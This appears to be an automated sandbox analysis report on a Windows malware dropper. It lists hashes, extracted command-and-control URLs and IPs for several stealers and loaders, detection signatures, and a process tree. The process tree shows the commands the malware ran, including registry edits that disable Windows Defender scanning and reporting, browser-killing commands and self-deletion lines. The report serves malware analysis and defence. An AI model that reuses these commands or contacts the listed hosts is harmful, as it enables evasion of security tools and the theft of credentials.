Analysis
-
max time kernel
156s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
10-03-2022 13:55
General
-
Target
60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe
-
Size
4.0MB
-
MD5
eba403353901b5fa6754e107870024b2
-
SHA1
aea5db03e085af98a0ea7dc2317c3a6318b2e51a
-
SHA256
60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3
-
SHA512
498b6ed94d5a2edc284e0729d47b4034a1438da9891427c12022264f5b96a4ce00a5ab1625dca6ab8d27ee7431cb3b82692ec33aeb46cbe71138e4626a554919
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
dadad123
86.107.197.196:63065
-
auth_value
dd4834614a3ac04a7b90791c224626a2
Extracted
vidar
50.6
937
https://mas.to/@s4msalo
https://koyu.space/@samsa2l
-
profile_id
937
Extracted
redline
nusha
65.108.27.131:45256
-
auth_value
1d7f942cf65dce68d206c152c3cd5a4a
Signatures
-
DcRat 14 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
OnlyLogger Payload 4 IoCs
-
Vidar Stealer 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 33 IoCs
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 5 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 9 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 25 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies registry class 6 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 29 IoCs
-
Suspicious use of SendNotifyMessage 9 IoCs
-
Suspicious use of SetWindowsHookEx 15 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe"C:\Users\Admin\AppData\Local\Temp\60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji73⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ffadc3246f8,0x7ffadc324708,0x7ffadc3247184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5368 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7b4715460,0x7ff7b4715470,0x7ff7b47154805⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4360 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5424 /prefetch:84⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 9963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 10323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 14083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 10883⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffadc3246f8,0x7ffadc324708,0x7ffadc3247183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,10334633456463974671,2748795355878468169,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,10334633456463974671,2748795355878468169,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 6084⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"2⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\88_AKQYj8XKniHVblGMGInY1.exe"C:\Users\Admin\Documents\88_AKQYj8XKniHVblGMGInY1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 4604⤵
- Program crash
-
C:\Users\Admin\Documents\Q9TMJHcyWJ57WbegY93a0ML8.exe"C:\Users\Admin\Documents\Q9TMJHcyWJ57WbegY93a0ML8.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Netdhcpsvc\77FTyD6gK21dfSGhRqsixY3e.vbe"4⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Netdhcpsvc\jGDslx6begqObyzNRSfaWpJOf.bat" "5⤵
-
C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"6⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wdag\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wdag\identity_helper.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\A6K08m5pRpo6aGMX_AWxJpZ6.exe"C:\Users\Admin\Documents\A6K08m5pRpo6aGMX_AWxJpZ6.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\HiCCOQU8W2MgCEoQfgwK62LY.exe"C:\Users\Admin\Documents\HiCCOQU8W2MgCEoQfgwK62LY.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im HiCCOQU8W2MgCEoQfgwK62LY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\HiCCOQU8W2MgCEoQfgwK62LY.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im HiCCOQU8W2MgCEoQfgwK62LY.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\1RtnrOsPJsTdMrVTQK_5xpeq.exe"C:\Users\Admin\Documents\1RtnrOsPJsTdMrVTQK_5xpeq.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\nn3clCgMOnoaDCpiVeYozBOV.exe"C:\Users\Admin\Documents\nn3clCgMOnoaDCpiVeYozBOV.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\YKOKkaI3LsSt6IA_vuSEb54U.exe"C:\Users\Admin\Documents\YKOKkaI3LsSt6IA_vuSEb54U.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\YKOKkaI3LsSt6IA_vuSEb54U.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Documents\z9bHtF5UDDCm2VBLh0RUU9Hi.exe"C:\Users\Admin\Documents\z9bHtF5UDDCm2VBLh0RUU9Hi.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\v0Bp_MkdSi3FaqCdJ94sVkiH.exe"C:\Users\Admin\Documents\v0Bp_MkdSi3FaqCdJ94sVkiH.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"6⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif6⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\waitfor.exewaitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT6⤵
-
C:\Users\Admin\Documents\FrkWCoBi3Z2dPBaJvUIiG48f.exe"C:\Users\Admin\Documents\FrkWCoBi3Z2dPBaJvUIiG48f.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSD47.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS1B51.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
